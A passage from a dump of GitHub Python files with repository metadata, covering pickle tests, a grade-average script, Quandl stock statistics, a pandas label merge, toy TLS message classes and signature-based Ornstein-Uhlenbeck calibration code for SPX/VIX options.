Foo2 = pickle_loads(s)\n assert inspect.isclass(Foo2)\n assert Foo is not Foo2 # We get a new class.\n assert Foo2.a == \"class\"\n assert Foo2.b == \"foo\"\n\n inst = Foo2()\n assert inst.a == \"hello\"\n assert inst.b == \"foo\"\n assert inst.f(42) == 42\n\n\ndef test_pickle_inst_anon_class():\n class Foo(object):\n a = \"class\"\n b = \"foo\"\n\n def __init__(self):\n self.a = \"hello\"\n\n def f(self, a):\n return a\n\n s = pickle_dumps(Foo())\n inst = pickle_loads(s)\n assert inst.a == \"hello\"\n assert inst.b == \"foo\"\n assert inst.f(42) == 42\n\n\nclass DemoClass:\n def method(self):\n return 42\n\n\ndef test_pickle():\n obj = DemoClass()\n s = pickle_dumps(obj.method)\n inst = pickle_loads(s)\n assert_equal(inst(), 42)\n","repo_name":"rwth-i6/returnn","sub_path":"tests/test_TaskSystem.py","file_name":"test_TaskSystem.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"53"} +{"seq_id":"42664426169","text":"\"\"\"\nCálculo de média das provas\n\nTrabalhando com operadores aritiméticos, lógicos e de comparação\n\nO sistema recebe 3 notas, e calcula a média aritimética dessas notas\n\nSe a média for menor do que 5, o sistema mostra uma mensagem de aluno REPROVADO\nSe a média for maior ou igual a 5 e menor do que 7, o sistema mostra uma mensagem de aluno em recuperação\nSe a média for maior do que 7, o sistema mostra uma mensagem de aluno APROVADO\n\nNa linha 27, também pode ser utilizada dessa forma: # elif media >= 5 and media < 7:\n\nE na linha 31 pode mudar o if para else: e pular para a próxima linha de descrição\n\n\"\"\"\n\nif __name__ == \"__main__\":\n nota_1 = float(input(\"Informe a primeira nota: \"))\n nota_2 = float(input(\"Informe a segunda nota: \"))\n nota_3 = float(input(\"Informe a terceira nota: \"))\n\n media = (nota_1+nota_2+nota_3) / 3\n\n print(f\"A média geral é: {media:.2f}\")\n\n if media < 5:\n print('aluno REPROVADO')\n elif 5 <= media < 7:\n print('aluno em recuperação')\n if media > 7:\n print('aluno APROVADO')","repo_name":"mafixx/pythonProject","sub_path":"003.py","file_name":"003.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22864035679","text":"import json\r\nimport numpy as np\r\nimport urllib.request\r\nimport requests\r\n\r\n\r\nAPIKEY=\"\"\r\nurl=\"https://www.quandl.com/api/v3/datasets/FSE/AFX_X.json?start_date=2017-01-01&end_date=2017-12-31&api_key=\"+APIKEY\r\njsonOutput=requests.get(url).json()\r\ndataset= jsonOutput['dataset']['data']\r\n\r\nstock_date = [elem[0] for elem in dataset if elem[0] != None]\r\nstock_open = [elem[1] for elem in dataset if elem[1] != None]\r\nstock_high = [elem[2] for elem in dataset if elem[2] != None]\r\nstock_low = [elem[3] for elem in dataset if elem[3] != None]\r\nstock_close = [elem[4] for elem in dataset if elem[4] != None]\r\nstock_vol = [elem[6] for elem in dataset if elem[6] != None]\r\nstock_turn = [elem[7] for elem in dataset if elem[7] != None]\r\n\r\ndef get_max_val(array):\r\n '''\r\n :param float or int array:\r\n :return: int\r\n '''\r\n max_val = array[0]\r\n for num in array:\r\n if num > max_val:\r\n max_val = num\r\n return max_val\r\n\r\ndef get_min_val(array):\r\n '''\r\n :param array:float or int\r\n :return: int\r\n '''\r\n min_val = array[0]\r\n for num in array:\r\n if num < min_val:\r\n min_val = num\r\n return min_val\r\n\r\ndef largest_change_one_day(s_low, s_high):\r\n '''\r\n :param s_low: float or int\r\n :param s_high: float or int\r\n :return: float or int\r\n '''\r\n delta = [high - low for low, high in zip(s_low, s_high)]\r\n max_delta = get_max_val(delta)\r\n return max_delta\r\n\r\ndef largest_delta_two_days_close(s_close):\r\n '''\r\n :param s_close: float or int\r\n :return: float or int\r\n '''\r\n delta_2d = [abs(s_close[i + 1] - s_close[i]) for i in range(len(s_close) - 1)]\r\n max_delta_2days = get_max_val(delta_2d)\r\n return max_delta_2days\r\n\r\ndef avg_daily_vol(s_vol):\r\n '''\r\n :param s_vol: float or int\r\n :return: float or int\r\n '''\r\n total_vol = 0\r\n for vol in s_vol:\r\n total_vol = total_vol + vol\r\n avg_vol = total_vol / len(s_vol)\r\n return (avg_vol)\r\n\r\ndef get_median(array):\r\n '''\r\n :param array: float or int\r\n :return:float or int\r\n '''\r\n array.sort()\r\n med_index = len(array) // 2\r\n median = (array[med_index] + array[~med_index]) / 2\r\n return (median)\r\n\r\nmin_open = get_min_val(stock_open)\r\nmax_open = get_max_val(stock_open)\r\nmax_change = largest_change_one_day(stock_low,stock_high)\r\nmax_change_two_days = largest_delta_two_days_close(stock_close)\r\navg_daily_vol_2017 = avg_daily_vol(stock_vol)\r\nmedian_volume_2017 = get_median(stock_vol)\r\n\r\nprint('3a. The lowest Opening Price: ${:0.2f}'.format(min_open))\r\nprint('3b. The highest Opening Price: ${:0.2f}'.format(max_open))\r\nprint('4. The largest change in one day : ${:0.2f}'.format(max_change))\r\nprint('5. The largest change in any two days (based on close price): ${:0.2f}'.format(max_change_two_days))\r\nprint('6. Average daily trading volume during this year: {:0,.2f} units'.format(avg_daily_vol_2017))\r\nprint('6. Median trading volume during this year: {:0,.2f} units'.format(median_volume_2017))","repo_name":"willkuhns/miniProject1","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30644403378","text":"import pandas as pd\n\n# names of files to read from\n\nr_filenameTSV = 'OAV_60000_Training48000.tsv'\nr_filenameCSV = 'OAV8020Predict.csv'\n\n\ntsv_read = pd.read_csv(r_filenameTSV, sep='\\t',names=[\"vector\"])\ncsv_read = pd.read_csv(r_filenameCSV,names=[\"label_predict\"])\n\ndf = pd.DataFrame(tsv_read)\ndf2 = pd.DataFrame(csv_read)\n\ndf = pd.DataFrame(df.vector.str.split(' ',1).tolist(),\n columns = ['label','vector'])\n\nprint (df)\nprint (df2)\n\nprint (df[['label']])\n\n#frames = ([df[['label']], df2])\n\nresult = pd.concat([pd.concat([df['label']], axis=0), pd.concat([df2], axis=0)], axis=1)\n\nprint (result)\n\nwith pd.ExcelWriter('output_label.xlsx') as writer: \n \t\t#df[['label']].to_excel(writer, sheet_name='Sheet_name_1')\n \t\tresult.to_excel(writer, sheet_name='Sheet_name_1')\n\n \n","repo_name":"matteoLorenzini/script","sub_path":"pandas/confusion.py","file_name":"confusion.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6005146558","text":"from MyTLS.MyTLSExceptions import WrongMessageException\nfrom MyTLS.Extras import *\nfrom MyTLS.MyTypes import *\nimport rsa\n\nclass AllMessages:\n version = None\n type = None\n reserved = None\n length = None\n data = None\n\n def __init__(self, msg: bytes):\n if msg.__len__() < 4:\n raise WrongMessageException(\"错误:报文长度过小\")\n\n self.version = msg[0] & 0xf0\n self.type = msg[0] & 0x0f\n self.reserved = msg[1]\n self.length = (msg[2] << 8) + msg[3]\n self.data = msg[4:]\n\n def _getNextHeader(self, msg: bytes) -> (int, bytes):\n if msg.__len__() < 2:\n raise WrongMessageException(\"错误:报文头长度过小\")\n\n length = (msg[0] << 8) + msg[1]\n if msg.__len__() < 2 + length:\n raise WrongMessageException(\"错误:错误的报文格式\")\n\n nextHeader = msg[2: length + 2]\n\n return length, nextHeader\n\n def _getHeader(self) -> list:\n headerIndex = 0\n msgLength = self.data.__len__()\n header = []\n\n while headerIndex < msgLength:\n headerLength, nextHeader = self._getNextHeader(self.data[headerIndex:])\n headerIndex += 2 + headerLength\n header.append(nextHeader)\n\n return header\n\n @staticmethod\n def makeBasicMessage(__type__: int,\n __length__: int,\n __version__ = messageType.VERSION_MYTLS1,\n __reserved__ = 0x0) -> bytes:\n return bytes([__version__ + __type__, __reserved__]) + short2bytes(__length__)\n\nclass HelloMessage(AllMessages):\n time = None\n randomNum = None\n encryMethod = None\n\n def __init__(self, msg: bytes):\n super().__init__(msg)\n\n if self.type != messageType.TYPE_HELLO:\n raise WrongMessageException(\"错误:Hello报文类型错误\")\n\n header = self._getHeader()\n if header.__len__() != 3:\n raise WrongMessageException(\"错误:Hello报文格式错误\")\n\n self.time = bytes2int(header[0][0: 4])\n self.randomNum = bytes2int(header[1][0: 4])\n self.encryMethod = bytes2int(header[2][0: 4])\n\n @staticmethod\n def makeMessage(__time__: int, __randomNum__: int, __encryMethod__: int) -> bytes:\n msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_HELLO,\n __length__=18)\n\n length_4 = short2bytes(4)\n msg += length_4 + int2bytes(__time__) + \\\n length_4 + int2bytes(__randomNum__) + \\\n length_4 + int2bytes(__encryMethod__)\n\n return msg\n\nclass certExchangeMessage(AllMessages):\n publicKey = None\n owner = None\n time = None\n\n def __init__(self, msg: bytes):\n super().__init__(msg)\n\n if self.type != messageType.TYPE_CERTEXCHANGE:\n raise WrongMessageException(\"错误:Certificate Exchange报文类型错误\")\n\n header = self._getHeader()\n if header.__len__() != 3:\n raise WrongMessageException(\"错误:Certificate Exchange报文格式错误\")\n\n t = header[0].decode(ENCODE_METHOD).split(\" \")\n tn = int(t[0])\n te = int(t[1])\n\n self.publicKey = rsa.PublicKey(tn, te)\n self.owner = header[1].decode(ENCODE_METHOD)\n self.time = bytes2int(header[2][0: 4])\n\n @staticmethod\n def makeMessage(__publicKey__: rsa.PublicKey, __owner__: str, __time__: int) -> bytes:\n ttMsg = (str(__publicKey__.n) + \" \" + str(__publicKey__.e)).encode(ENCODE_METHOD)\n length_ = short2bytes(ttMsg.__len__())\n tMsg = length_ + ttMsg\n\n ttMsg = __owner__.encode(ENCODE_METHOD)\n length_ = short2bytes(ttMsg.__len__())\n tMsg += length_ + ttMsg\n\n ttMsg = int2bytes(__time__)\n length_ = short2bytes(4)\n tMsg += length_ + ttMsg\n\n msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_CERTEXCHANGE,\n __length__=tMsg.__len__())\n\n return msg + tMsg\n\nclass keyExchangeMessage(AllMessages):\n key = None\n\n def __init__(self, msg: bytes):\n super().__init__(msg)\n\n if self.type != messageType.TYPE_KEYEXCHANGE:\n raise WrongMessageException(\"错误:Key Exchange报文类型错误\")\n\n header = self._getHeader()\n if header.__len__() != 1:\n raise WrongMessageException(\"错误:Key Exchange报文格式错误\")\n\n self.key = header[0]\n\n @staticmethod\n def makeMessage(__key__: bytes) -> bytes:\n msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_KEYEXCHANGE,\n __length__=2 + __key__.__len__())\n\n msg += short2bytes(__key__.__len__()) + __key__\n return msg\n\nclass HelloDoneMessage(AllMessages):\n def __init__(self, msg: bytes):\n super().__init__(msg)\n if self.type != messageType.TYPE_HELLODONE:\n raise WrongMessageException(\"错误:Hello Done报文类型错误\")\n\n @staticmethod\n def makeMessage() -> bytes:\n msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_HELLODONE,\n __length__=0)\n return msg\n\nclass ChangeCipherSpecMessage(AllMessages):\n def __init__(self, msg: bytes):\n super().__init__(msg)\n\n if self.type != messageType.TYPE_CHANGECIPHERSPEC:\n raise WrongMessageException(\"错误:Change Cipher Spec报文类型错误\")\n\n @staticmethod\n def makeMessage() -> bytes:\n msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_CHANGECIPHERSPEC,\n __length__=0)\n return msg\n\nclass FinishedMessage(AllMessages):\n finishedMsg = None\n\n def __init__(self, msg: bytes):\n super().__init__(msg)\n if self.type != messageType.TYPE_FINISHED:\n raise WrongMessageException(\"错误:Finished报文类型错误\")\n\n header = self._getHeader()\n if header.__len__() != 1:\n raise WrongMessageException(\"错误:Finished报文格式错误\")\n\n self.finishedMsg = header[0]\n\n @staticmethod\n def makeMessage(__finishedMsg__: bytes) -> bytes:\n msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_FINISHED,\n __length__=2 + __finishedMsg__.__len__())\n return msg + short2bytes(__finishedMsg__.__len__()) + __finishedMsg__\n\nclass Payload(AllMessages):\n payload = None\n\n def __init__(self, msg: bytes):\n super().__init__(msg)\n if self.type != messageType.TYPE_PAYLOAD:\n raise WrongMessageException(\"错误:payload报文类型错误\")\n\n self.payload = self.data\n\n @staticmethod\n def makeMessage(__payload__: bytes, __end__ = 0) -> bytes:\n msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_PAYLOAD,\n __length__=__payload__.__len__(),\n __reserved__=__end__)\n return msg + __payload__\n","repo_name":"typename-yyf/TLSProject","sub_path":"MyTLS/MessageTypes.py","file_name":"MessageTypes.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17991391193","text":"\"\"\"\nCreated on Sat Jan 28 18:08:38 2023\n\n@author: Guido Gazzani & Janka Moeller\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\nimport itertools as itt \nfrom tqdm.auto import tqdm\nimport os\nimport torch\nfrom numpy.linalg import cholesky\nfrom joblib import Parallel,delayed\nfrom scipy.stats import random_correlation\nimport signatory \n\nprint('Signatory version:',signatory.__version__)\nprint('Torch version',torch.__version__)\nprint('Numpy version',np.__version__)\n\n#Choose maturities and day (notice not the same maturities across different days!)\n\nflag_gatheral=False\nflag_missing_last=False\nflag_save_control_variates=False\navailable_Gplus=False\nnumerical_approx=False\nflag_chol_vix=True\n\n\n########## the configuration is just an indicator of some pre-initialized parameters of the primary object\n########## it acts as our Reservoir\n\nconfig='config8'\n\n\nif flag_gatheral==True: \n##################### for GATHERAL TEST (see the maturities used in the Quadratic Rough Heston)\n list_of_maturities_vix=np.array([12.0, 19.0, 26.0, 33.0])/365.25\n list_of_maturities_spx=np.array([12.0, 19.0, 26.0, 33.0])/365.25\n\nelse:\n list_of_maturities_vix=np.array([14.0, 28.0, 49.0, 77.0, 105.0, 140.0, 259.0])/365.25\n list_of_maturities_spx=np.array([14.0, 44.0, 58.0, 79.0, 107.0, 135.0, 170.0, 181.0, 198.0, 212.0, 233.0, 289.0, 380.0])/365.25\n\n \n\n#For 20210602\n############################################\n# PLEASE SELECT MORE SPX MATURITIES THAN VIX MATURITIES!\n\n\n\ndef cubes_zeros(n,m):\n '''\n Inputs:\n n: int\n m: int\n \n Return: list of m+1 cubes of increasing order from 0 to n^m\n '''\n cubes=[0,]\n for K in range(0,m):\n cubes.append(np.tensordot(cubes[-1],np.zeros((n,)), axes=0))\n return cubes\n\ndef fromcubestoarray (cubes):\n '''\n Inputs:\n cubes: list of cubes of increasing order\n \n Return:\n array: list \n stretched cubes\n '''\n array = [cubes[0],]\n values=[i for i in range(len(cubes[1]))]\n for k in range(1,len(cubes)):\n for word in itt.product(values, repeat=k):\n array= array+[cubes[k][word],]\n array = np.array(array)\n return array\n\ndef shuffle(a,b):#### a faster implementation is available if needed\n '''\n Inputs:\n a : list\n a word to be shuffled\n b : list\n b word to be shuffled\n \n Return:\n sh : list\n shuffle between a and b\n '''\n sh = []\n if len(a)==0:\n return [b,]\n if len(b)==0:\n return [a,]\n else:\n [sh.append([a[0],]+p) for p in shuffle(a[1:],b)]\n [sh.append([b[0],]+p) for p in shuffle(a,b[1:])]\n return sh\n\n\ndef sum_of_powers(x,y):\n '''\n Inputs:\n x,y : int, int \n Returns: sum over i=0 to y of x^y\n '''\n if y<=0:\n return 1\n else:\n return x**y + sum_of_powers(x,y-1)\n \ndef number_of_parameters_gen(order_signature,comp_of_path):\n '''\n Inputs:\n order_signature : int\n comp_of_path : int\n \n Return:\n sp : d_n if d=comp_of_path, n=order_signature\n '''\n sp=sum_of_powers(comp_of_path,order_signature)\n \n return sp\n\n\n\ndef OUL(d,m,Y_0,thetas,kappas,sigmas,Rho): #Computes the matrix G^T associated to the drift operator\n ''' # See also implementation in Cuchiero, Svaluto-Ferro, Teichmann (2023), they are equivalent\n Inputs:\n d : int\n m : int \n Y_0: list of initial values of the OU processes\n thetas: list of long-run means of the OUs\n kappas: list of reverting speeds of the OUs\n sigmas: list of volatilities of the OUs\n Rho: dxd np.array, correlation matrix of the OUs\n \n Returns:\n matrix: (d_m)x(d_m) np.array, G^T matrix associated to the operator\n '''\n \n dim=d+1\n matrix=np.zeros(int((dim**(m+1)-1)/(dim-1)))\n b_first=[kappas[i]*(thetas[i]-Y_0[i]) for i in range(d)]\n b_second=[-kappas[i] for i in range(d)]\n A_matrix=np.zeros((dim,dim))\n for i in range(1,dim):\n for j in range(1,dim):\n A_matrix[i,j]=(1/2)*Rho[i-1,j-1]*sigmas[i-1]*sigmas[j-1]\n \n for k in tqdm(range(1,m+1)):\n for word in itt.product([letters for letters in range(dim)],repeat=k): \n cubes=cubes_zeros(d+1,m)\n if word[-1]==0:\n if k==1:\n cubes[0]=1\n else:\n cubes[k-1][tuple(word[:-1])] = 1\n else:#if the word ends with something different than zero/ i.e., diff. than time-component\n if k==1:\n cubes[0]=cubes[0]+b_first[word[-1]-1]\n cubes[k][word]=cubes[k][word]+b_second[word[-1]-1] #fino qua corretto\n if k>1:\n cubes[k-1][tuple(word[:-1])]=cubes[k-1][tuple(word[:-1])]+b_first[word[-1]-1]\n \n if k==2:\n cubes[0]=cubes[0]+A_matrix[word[-1],word[-2]] \n else:\n cubes[k-2][tuple(word[:-2])]=cubes[k-2][tuple(word[:-2])]+A_matrix[word[-1],word[-2]]\n\n for sh in shuffle(list(word)[:-1],[word[-1]]):\n cubes[k][tuple(sh)]=cubes[k][tuple(sh)]+b_second[word[-1]-1]\n \n newline = fromcubestoarray(cubes)\n matrix = np.vstack((matrix,newline))\n return matrix\n\n\n\ndef get_words(d,order_signature):\n '''\n Inputs: \n d: int\n order_signature: int\n \n Returns:\n words: list of TUPLES (words) up to letter d and length order_signature\n '''\n words=[()]\n for k in range(1,order_signature+1):\n for word in itt.product([letters for letters in range(d+1)],repeat=k):\n words.append(word)\n \n return words\n\ndef get_words_list(d,order_signature):\n '''\n Inputs: \n d: int\n order_signature: int\n \n Returns:\n words: list of LISTS (words) up to letter d and length order_signature\n '''\n words=[[]]\n for k in range(1,order_signature+1):\n for word in itt.product([letters for letters in range(d+1)],repeat=k):\n words.append(list(word))\n \n return words\n\n\ndef multidimensional_OU(X0,N,T,Rho,kappas,thetas,sigmas,flag_aug,flag_mat):\n '''\n Inputs: \n X0: list of initial values of the OU processes\n N: int, number of grid points\n T: float/int final time\n Rho: dxd np.array, correlation matrix of the OUs\n kappas: list of reverting speeds of the OUs\n thetas: list of long-run means of the OUs\n sigmas: list of volatilities of the OUs\n flag_aug: if False, return (X_t) and not (t,X_t)\n flag_mat: if True, N is set to daily sampling (calendar days)\n \n Returns: \n X: np.array (t,X_t)_{t\\in[0,T]} \n W: np.array (W_t) driving Bms\n \n '''\n \n ######################################################################################## Comment: if you \n ####################### uncomment some chunks you will retrieve the underlying correlated brownian motions\n ####################### and you can switch to Euler-Maruyama instead that simulating directly from the solution of the SD\n if flag_mat==True: #flag_mat is to sample up to a maturity time T>0 with daily sampling\n N=int(np.rint(T*365.25)) #flag_aug is to return (t,X_t) \n\n dim=len(X0)\n A=np.zeros((dim,dim))\n A=np.matrix(A)\n for i in range(dim):\n for j in range(dim):\n A[i,j]=Rho[i,j]*sigmas[i]*sigmas[j] \n C=cholesky(A)\n #C_1=cholesky(Rho)\n X = np.zeros([dim, int(N+1)])\n X[:,0]=X0\n #X_tilde[:,0]=X0\n T_vec, dt = np.linspace(0, T, N+1, retstep=True ) \n print(dt)\n BMs=np.zeros([dim, int(N+1)])\n expy=np.array([np.exp(-kappas[j]*dt) for j in range(len(kappas))])\n Z = np.random.normal(0., 1., (dim,N+1))\n diffusion = np.matmul(C, Z)*np.sqrt(dt)\n thetas=np.array(thetas) ######################################################### up to here can be done outside the function to speed up\n for i in range(1,int(N+1)):\n #Z_i=Z[:,i]\n diffusion_i = diffusion[:,i].squeeze(1) #these are diffusions including the BM\n #BMs[:,i]=np.matmul(C_1, Z_i)*np.sqrt(dt) #these are all BMs\n #X[:,i]=X[:,i-1]+kappas*(thetas-X[:,i-1])*dt+diffusion \n X[:,i]=thetas+np.multiply((X[:,i-1]-thetas),expy)+diffusion_i \n if flag_aug==False:\n return X,T_vec,np.cumsum(BMs,axis=1)\n else:\n return np.concatenate((np.expand_dims(T_vec,0),X),axis=0), np.cumsum(BMs,axis=1)\n\ndef sample_sig_OU_multi_minimal(N,T,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat):\n '''Inputs: same as the previous function'''\n \n augmented_OU, Bms =multidimensional_OU(X0,N,T,Rho,kappas,thetas,sigmas,True,flag_mat)\n augmented_OU_torch=torch.from_numpy(augmented_OU.transpose()).unsqueeze(0)\n sig=signatory.signature(augmented_OU_torch,order_signature,stream=True,basepoint=False,scalar_term=True)\n sig_arr=sig.squeeze().numpy()\n return sig_arr\n\n\n\ndef sample_sig_OU_multi_minimal_all_mat(N,maturities,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat):\n '''Inputs: in addition to the previous function\n here it samples a full set of maturities\n maturities: np.array\n '''\n \n last_mat= maturities[-1]\n full_sig= sample_sig_OU_multi_minimal(N,last_mat+1/365.25,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat) \n mat_in_days= [int(np.rint(m*365.25)) for m in maturities]\n get_model= [full_sig[m-1,:] for m in mat_in_days]\n get_model=np.array(get_model)\n return get_model\n\nmaturity=0.5\nflag_mat=True\nN=int(maturity*365.25) # put here the daily sampling\nT=maturity # put here maturities\n## first three a bit redundant \n\n\n\n \nif int(config[-1])==8: \n d=4\n order_signature=3\n sigmas=[0.7,10,5,1]\n kappas=[0.1,25,10,0]\n X0=[1,0.08,2,0]\n thetas=[0.1,4,0.08,0]\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness/n=2/config2')\n Rho =np.load('Rho_d=4.npy')\n\nif int(config[-1])==0: ############ Only correlated Brownian motions\n d=3\n order_signature=3\n sigmas=[1,1,1]\n kappas=[0,0,0]\n X0=[0,0,0]\n thetas=[0,0,0]\n \n rng = np.random.default_rng(1267)\n Rho = random_correlation.rvs((2, 0.7, 0.3), random_state=rng)\n \n\n\ndim=d+1\n\nprint('sigmas:\\n',sigmas)\nprint('kappas:\\n',kappas)\nprint('thetas:\\n',thetas)\nprint('\\n')\nprint('Dimension expected/number of parameters to calibrate:',number_of_parameters_gen(order_signature,d))\nd_star=number_of_parameters_gen(order_signature,dim)\nnbr_param=number_of_parameters_gen(order_signature*2,d+1)\nRho=Rho[:len(X0),:len(X0)]\nprint('Correlation matrix:\\n',np.matrix(Rho).round(4))\n\n\nkeys_df=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(d,order_signature*2+1)]\nwords_as_lists=get_words_list(d,order_signature)\nwords_as_strings=[str(word).replace(\" \", \"\") for word in get_words(d,order_signature)]\n\n\ndef e_tilde_multivariate(word,d):\n '''\n Inputs:\n word: list of ints\n d: int, \"highest\" letter considered\n \n \n Returns:\n new_words: list of lists, if word[-1]==0 add process component \n new_words2: list of lists, only if word[-1]=!0, Ito-Stratonovich corrections\n \n '''\n \n the_components=np.array(range(d))+1\n new_words=[]\n for k in range(d):\n new_words.append(word.copy())\n new_words[k].append(the_components[k])\n if word[-1]==0:\n return new_words\n if word[-1]!=0: \n new_words2=[]\n for j in range(d):\n new_words2.append(word.copy())\n new_words2[j][-1]=0\n return new_words, new_words2\n\n\ndef e_tilde_multivariate_part2(words_as_lists,d):\n '''\n Inputs:\n words_as_lists: list of lists of ints\n d: int components\n \n Returns: list of lists, tilde auxiliary output\n '''\n tilde=[list(e_tilde_multivariate(words_as_lists[k],d)) for k in np.array(range(len(words_as_lists)))[1:]]\n return tilde\n\ntilde=e_tilde_multivariate_part2(words_as_lists,d)\ntilde_copy=tilde.copy()\n#print(tilde)\n\ndef list_to_string(my_list):\n '''\n Inputs: \n my_list: list\n \n Returns: a string version of the list\n '''\n \n if len(my_list)==1:\n return str(tuple(my_list)).replace(\",\",\"\")\n else:\n return str(tuple(my_list)).replace(\" \",\"\")\n\ndef from_tilde_to_string(tilde,d):\n ''' \n Inputs: \n - The output of function e_tilde_multivariate_part2 (copied)\n d: int, components\n Returns: list of strings, the tilde transformation labels\n '''\n dimension_one_plus=d+1\n for k in range(len(tilde)):\n if k%dimension_one_plus==0:\n tilde[k]=[str(tuple(tilde[k][j])).replace(\" \",\"\") for j in range(len(tilde[k]))]\n else:\n tilde[k][0]=[list_to_string(element) for element in tilde[k][0]]\n tilde[k][1]=[list_to_string(element) for element in tilde[k][1]]\n \n return tilde\n\n\n# IMPORTANT FOR TILDE TRANSFORMATION\nnew_tilde=from_tilde_to_string(tilde,d)\n\n\ndef get_cov_mat(sigmas,Rho,d):\n '''\n Inputs:\n sigmas: list of sigmas\n Rho_ex: dxd np.array, Rho correlation matrix\n d: int \n ''' \n Rho_ex=np.zeros([d+1,d+1])\n Rho_ex[1:,1:]=Rho\n Cov=np.zeros([d+1,d+1])\n for j in range(1,d+1):\n for k in range(1,d+1):\n Cov[j,k]=Rho_ex[j,k]*(sigmas[j-1]*sigmas[k-1])\n return Cov\n\n\n\nCov=get_cov_mat(sigmas,Rho,d)\n#print('Covariance matrix augmented for the time:\\n',Cov)\n\n\ndef transform_df_multivariate(sig_df,new_tilde,order_signature,d,Cov): \n '''\n Inputs:\n sig_df: pandas_df or pandas_series, output of function sample_sig_OU_multi()\n new_tilde: output of the tilde transformation\n order_signature: int, order of the signature\n d: int, components\n Cov: d+1xd+1 np.array, Covariance matrix (with additional row and columns for the time)\n \n Returns: \n df_concat_new: pandas_df, signature after tilde transformation\n ''' \n words_as_lists=get_words_list(len(X0),order_signature)\n strings=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(len(X0),order_signature)]\n auxiliary_empty_lists = [[] for i in range(d)]\n \n for k in range(len(strings)):\n if k==0:\n for j in range(1,d+1):\n auxiliary_empty_lists[j-1].insert(0,sig_df[strings[j+1]])\n if ((k>0) and (words_as_lists[k][-1]==0)):\n for j in range(1,d+1):\n auxiliary_empty_lists[j-1].append(sig_df[new_tilde[k-1][j-1]])\n if ((k>0) and (words_as_lists[k][-1]!=0)):\n r=words_as_lists[k][-1]\n for j in range(1,d+1):\n auxiliary_empty_lists[j-1].append(sig_df[new_tilde[k-1][0][j-1]]-Cov[j,r]*0.5*sig_df[new_tilde[k-1][1][j-1]])\n helper_=[]\n for j in range(d):\n new_keys=[strings[k]+str('~Z_{}'.format(j+1)) for k in range(len(strings))]\n new_dict={key:series for key,series in zip(new_keys,auxiliary_empty_lists[j])}\n transformed_data_frame_W=pd.DataFrame(new_dict)\n helper_.append(transformed_data_frame_W)\n df_concat_new=pd.concat(helper_,axis=1)\n return df_concat_new\n\n\ndef get_tilde_keys(d,order_signature):\n strings=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(d,order_signature)]\n list_tilde_keys=[]\n for j in range(d):\n new_keys=np.array([strings[k]+str('~Z_{}'.format(j+1)) for k in range(len(strings))])\n list_tilde_keys.append(new_keys)\n return list(np.array(list_tilde_keys).flatten())\n\n\nlist_joint_maturities=np.sort(np.array(list(set(list(list_of_maturities_vix)+list(list_of_maturities_spx)))))\n#indices=['Maturity T={}'.format(j) for j in range(1,max(len(list_of_maturities_spx),len(list_of_maturities_vix))+1)]\nindices=['Maturity T={}'.format(j) for j in range(1,len(list_joint_maturities)+1)]\ntilde_keys=get_tilde_keys(d,order_signature)\nidx_Z_d=[important_key for important_key in tilde_keys if important_key[-3:]=='Z_'+str(d)]\nkeys_df_vix=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(d-1,order_signature*2)]\n\n\ndef remove_redundant_components(transformed_df,idx_Z_d,d,flag_not_dropped):\n '''\n Inputs:\n transformed_df: pandas DataFrame, tilde signature at maturity\n idx_Z_d: list of strings (labels of the last integral wrt Z_d)\n d: int, components\n flag_not_dropped: boolean, if True returns the index of the labels to be kept\n Returns:\n df: pandas DataFrame, tilde signature without the redundant components\n \n '''\n \n df=transformed_df[idx_Z_d]\n if flag_not_dropped==True:\n \n not_dropped=[] \n for i,c in enumerate(df.columns):\n if str(d) in c[:-4]:\n df=df.drop(columns=[c])\n else:\n not_dropped.append(i)\n return df, not_dropped\n else:\n for i,c in enumerate(df.columns):\n if str(d) in c[:-4]:\n df=df.drop(columns=[c])\n return df \n\n\ndef append_time(a):\n '''\n -Auxiliar function to append time to a list \"a\"\n '''\n aux=a.copy()\n aux.append(0)\n return [aux]\n\ndef shuffle_and_add_time(a,b):\n '''\n Inputs: #Only difference with the shuffle function is that we always append [0] (time-component) at the end\n a : array\n a word to be shuffled\n b : array\n b word to be shuffled\n \n Returns:\n sh : list\n shuffle between a and b\n '''\n sh = []\n if len(a)==0:\n return append_time(b)\n if len(b)==0:\n return append_time(a)\n else:\n [sh.append([a[0],]+p+[0]) for p in shuffle(a[1:],b)]\n [sh.append([b[0],]+p+[0]) for p in shuffle(a,b[1:])]\n return sh\n\n\ndef p_shuffle(order_signatrue,d):\n '''\n Inputs: \n order_signature, d: int, int\n \n Returns:\n p, torch.tensor dimension d+1_n x d+1_n x d+1_2n \n \n '''\n \n nbr_param_x2plus=number_of_parameters_gen(order_signature*2+1,d+1)\n dict_words_numbers=dict(zip(get_words(d,order_signature*2+1),[k for k in range(nbr_param_x2plus)]))\n p=[]\n wordz=get_words_list(d,order_signature)\n for word1 in tqdm(wordz):\n for word2 in wordz:\n sh=shuffle_and_add_time(word1,word2)\n p_components=np.zeros(nbr_param_x2plus)\n for shuffled in sh:\n 